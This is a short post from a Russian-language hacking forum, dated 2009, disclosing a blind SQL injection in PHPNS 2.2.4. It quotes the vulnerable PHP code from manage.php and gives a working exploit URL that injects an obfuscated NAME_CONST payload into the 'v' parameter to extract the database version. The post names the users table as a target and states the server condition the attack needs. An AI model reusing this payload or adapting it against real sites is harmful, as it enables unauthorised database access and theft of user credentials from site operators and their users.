16.11.2009, 01:13
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
PHPNS version 2.2.4 BLIND SQL INJECTION
Уязвимый скрипт manage.php:
PHP код:
...
while ($item_row = mysql_fetch_array($item_list)) { //for each item in db
//convert timestamp to readable/human date
$item_row['timestamp'] = date($globalvars['time_format'],$item_row['timestamp']);
$item_row['article_cat_name'] = gen_cat_name($item_row['article_cat']); //switch cat_id to readable name
$row_bg = ($row_bg == $globalvars['altcolor'][2]) ? $globalvars['altcolor'][1] : $globalvars['altcolor'][2]; //current row bg
//switch active column to yes, draft, or unapproved.
if ($item_row['active'] == 1) { $item_row['active'] = '<span class="positive">Yes</span>'; } elseif ($item_row['active'] == 0) { $item_row['active'] = '<span class="negative">Draft</span>'; }
if ($item_row['approved'] == 0) { $item_row['active'] = '<span class="negative">Unapproved</span>'; }
$item_row['comments'] = mysql_num_rows(general_query('SELECT * FROM '.$databaseinfo['prefix'].'comments WHERE article_id="'.$item_row['id'].'"'));
if (strlen($item_row['article_title']) > 30) {
$item_row['article_title'] = wordwrap($item_row['article_title'], 30, "<br />");
}
//generate the actual html rows
$table_rows = $table_rows.'<tr bgcolor="'.$row_bg.'">
<td>
<a href="article.php?id='.$item_row['id'].'&do=edit"><img src="images/icons/edit.png" class="row_icon" alt="edit icon" title="edit "'.$item_row['article_title'].'"" /></a>
<a href="article.php?id='.$item_row['id'].'&do=edit" title="edit "'.$item_row['article_title'].'""><strong>'.$item_row['article_title'].'</strong></a>
</td>
<td><a href="manage.php?v='.$item_row['article_cat'].'">'.$item_row['article_cat_name'].'</a></td>
<td>'.$item_row['timestamp'].'</td>
<td><a href="manage.php?v='.$item_row['article_author'].'">'.$item_row['article_author'].'</a></td>
<td align="center"><a href="article.php?do=comments&id='.$item_row['id'].'">'.$item_row['comments'].'</a></td>
<td align="center">'.$item_row['active'].'</td>
<td class="checkbox"><input type="checkbox" value="'.$item_row['id'].'" name="'.$item_row['id'].'"></td></tr>';
} //end of each item in db generation
...
Реализация:
Код:
http://localhost/15/manage.php?v=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+
Таблица с юзерами: phpns_users
Для успешной реализации - magic_quotes_gpc = off
|
|
|